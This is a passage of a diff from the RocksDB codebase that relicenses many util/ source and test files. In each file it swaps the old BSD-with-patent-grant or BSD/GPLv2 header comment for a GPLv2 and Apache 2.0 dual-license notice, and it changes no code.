additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/auto_roll_logger.cc b/util/auto_roll_logger.cc index 39db9b5c831..ae6061aed43 100644 --- a/util/auto_roll_logger.cc +++ b/util/auto_roll_logger.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "util/auto_roll_logger.h" #include "util/mutexlock.h" diff --git a/util/auto_roll_logger.h b/util/auto_roll_logger.h index 823120e3f87..2f1f943d6a6 100644 --- a/util/auto_roll_logger.h +++ b/util/auto_roll_logger.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Logger implementation that can be shared by all environments // where enough posix functionality is available. diff --git a/util/auto_roll_logger_test.cc b/util/auto_roll_logger_test.cc index 910ddfee5b9..9b39748ce73 100644 --- a/util/auto_roll_logger_test.cc +++ b/util/auto_roll_logger_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/util/autovector.h b/util/autovector.h index 48635a95bc3..b5c84712450 100644 --- a/util/autovector.h +++ b/util/autovector.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/util/autovector_test.cc b/util/autovector_test.cc index 888b9db231f..2d7bcea57d8 100644 --- a/util/autovector_test.cc +++ b/util/autovector_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/util/bloom.cc b/util/bloom.cc index 5101f7931ce..9af17f87328 100644 --- a/util/bloom.cc +++ b/util/bloom.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/bloom_test.cc b/util/bloom_test.cc index e868021e503..9c323414ece 100644 --- a/util/bloom_test.cc +++ b/util/bloom_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/build_version.h b/util/build_version.h index d946b017aac..36ff92c078d 100644 --- a/util/build_version.h +++ b/util/build_version.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #if !defined(IOS_CROSS_COMPILE) diff --git a/util/channel.h b/util/channel.h index 013fd463231..1b030192cf9 100644 --- a/util/channel.h +++ b/util/channel.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/util/coding.cc b/util/coding.cc index 83b8bec3d74..3b58e3f1fae 100644 --- a/util/coding.cc +++ b/util/coding.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/coding.h b/util/coding.h index be33dba8d37..5cf009472ac 100644 --- a/util/coding.h +++ b/util/coding.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/coding_test.cc b/util/coding_test.cc index e069b5a28bd..49fb73d4ab0 100644 --- a/util/coding_test.cc +++ b/util/coding_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/compaction_job_stats_impl.cc b/util/compaction_job_stats_impl.cc index 148c17639dd..1787e839f8e 100644 --- a/util/compaction_job_stats_impl.cc +++ b/util/compaction_job_stats_impl.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/compaction_job_stats.h" diff --git a/util/comparator.cc b/util/comparator.cc index c070fd1e4c4..f3148f754f4 100644 --- a/util/comparator.cc +++ b/util/comparator.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/compression.h b/util/compression.h index c3c3d79ff7a..468b961fbfd 100644 --- a/util/compression.h +++ b/util/compression.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/concurrent_arena.cc b/util/concurrent_arena.cc index a99da1547e6..07fa03cf784 100644 --- a/util/concurrent_arena.cc +++ b/util/concurrent_arena.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/concurrent_arena.h b/util/concurrent_arena.h index 395598729a4..a79fb95fe2d 100644 --- a/util/concurrent_arena.h +++ b/util/concurrent_arena.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/core_local.h b/util/core_local.h index 4239df62efc..4cc4fd90cbb 100644 --- a/util/core_local.h +++ b/util/core_local.h @@ -1,9 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/util/crc32c.cc b/util/crc32c.cc index b12f2c7bf3d..ae36f82305b 100644 --- a/util/crc32c.cc +++ b/util/crc32c.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/crc32c.h b/util/crc32c.h index b7a3d53959a..984852969ac 100644 --- a/util/crc32c.h +++ b/util/crc32c.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/crc32c_test.cc b/util/crc32c_test.cc index 9bf9fd3c214..306194e9c1a 100644 --- a/util/crc32c_test.cc +++ b/util/crc32c_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/delete_scheduler.cc b/util/delete_scheduler.cc index 8ff979d7d28..93fc166971c 100644 --- a/util/delete_scheduler.cc +++ b/util/delete_scheduler.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/util/delete_scheduler.h b/util/delete_scheduler.h index ffc770a2d77..4c07ed67c80 100644 --- a/util/delete_scheduler.h +++ b/util/delete_scheduler.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/util/delete_scheduler_test.cc b/util/delete_scheduler_test.cc index 071ceea9dba..6667289185f 100644 --- a/util/delete_scheduler_test.cc +++ b/util/delete_scheduler_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef __STDC_FORMAT_MACROS #define __STDC_FORMAT_MACROS diff --git a/util/dynamic_bloom.cc b/util/dynamic_bloom.cc index bd54ed933eb..7c296cb4db5 100644 --- a/util/dynamic_bloom.cc +++ b/util/dynamic_bloom.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "dynamic_bloom.h" diff --git a/util/dynamic_bloom.h b/util/dynamic_bloom.h index 8756120e9cd..17325dd3905 100644 --- a/util/dynamic_bloom.h +++ b/util/dynamic_bloom.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/util/dynamic_bloom_test.cc b/util/dynamic_bloom_test.cc index bc5f62a2890..f50036b76ae 100644 --- a/util/dynamic_bloom_test.cc +++ b/util/dynamic_bloom_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef GFLAGS #include diff --git a/util/event_logger.cc b/util/event_logger.cc index c53c8474021..b488984f350 100644 --- a/util/event_logger.cc +++ b/util/event_logger.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef __STDC_FORMAT_MACROS #define __STDC_FORMAT_MACROS diff --git a/util/event_logger.h b/util/event_logger.h index 2197f5a7e86..d88a6a4fe68 100644 --- a/util/event_logger.h +++ b/util/event_logger.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/util/event_logger_test.cc b/util/event_logger_test.cc index 6ee193c73e8..13b639442e6 100644 --- a/util/event_logger_test.cc +++ b/util/event_logger_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/util/fault_injection_test_env.cc b/util/fault_injection_test_env.cc index 5dd290c5157..3b3a8b9359e 100644 --- a/util/fault_injection_test_env.cc +++ b/util/fault_injection_test_env.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright 2014 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/fault_injection_test_env.h b/util/fault_injection_test_env.h index b21037c320e..5d0ae634456 100644 --- a/util/fault_injection_test_env.h +++ b/util/fault_injection_test_env.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright 2014 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/file_reader_writer.cc b/util/file_reader_writer.cc index b578b642a2d..22ab7128781 100644 --- a/util/file_reader_writer.cc +++ b/util/file_reader_writer.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/file_reader_writer.h b/util/file_reader_writer.h index 2c524a14a0a..deed73c38df 100644 --- a/util/file_reader_writer.h +++ b/util/file_reader_writer.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/file_reader_writer_test.cc b/util/file_reader_writer_test.cc index 00a32fc2531..dac5182452b 100644 --- a/util/file_reader_writer_test.cc +++ b/util/file_reader_writer_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "util/file_reader_writer.h" #include diff --git a/util/file_util.cc b/util/file_util.cc index 829570d3878..c6323b35b01 100644 --- a/util/file_util.cc +++ b/util/file_util.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "util/file_util.h" diff --git a/util/file_util.h b/util/file_util.h index 24c47298490..e59377ab170 100644 --- a/util/file_util.h +++ b/util/file_util.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #include diff --git a/util/filelock_test.cc b/util/filelock_test.cc index 29e043038cc..cb4bd43be4a 100644 --- a/util/filelock_test.cc +++ b/util/filelock_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "rocksdb/status.h" #include "rocksdb/env.h" diff --git a/util/filename.cc b/util/filename.cc index dede1ca2063..fa1618e1ff0 100644 --- a/util/filename.cc +++ b/util/filename.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/filename.h b/util/filename.h index ceb4aedf9f2..0d4bacf536b 100644 --- a/util/filename.h +++ b/util/filename.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/filter_policy.cc b/util/filter_policy.cc index 444b17c52ac..efb9bf4763c 100644 --- a/util/filter_policy.cc +++ b/util/filter_policy.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/hash.cc b/util/hash.cc index aaa3070e9ed..a0660c60a42 100644 --- a/util/hash.cc +++ b/util/hash.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/hash.h b/util/hash.h index 025c566bf6a..4a13f456440 100644 --- a/util/hash.h +++ b/util/hash.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/hash_map.h b/util/hash_map.h index d39f59226fb..7b08fb39936 100644 --- a/util/hash_map.h +++ b/util/hash_map.h @@ -1,7 +1,7 @@ -// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. This -// source code is licensed under the BSD-style license found in the LICENSE -// file in the root directory of this source tree. An additional grant of -// patent rights can be found in the PATENTS file in the same directory. +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/util/hash_test.cc b/util/hash_test.cc index 2f03026310c..959e8cd0f68 100644 --- a/util/hash_test.cc +++ b/util/hash_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/heap.h b/util/heap.h index c5a864f17b2..4d5894134f2 100644 --- a/util/heap.h +++ b/util/heap.h @@ -1,9 +1,7 @@ // Copyright 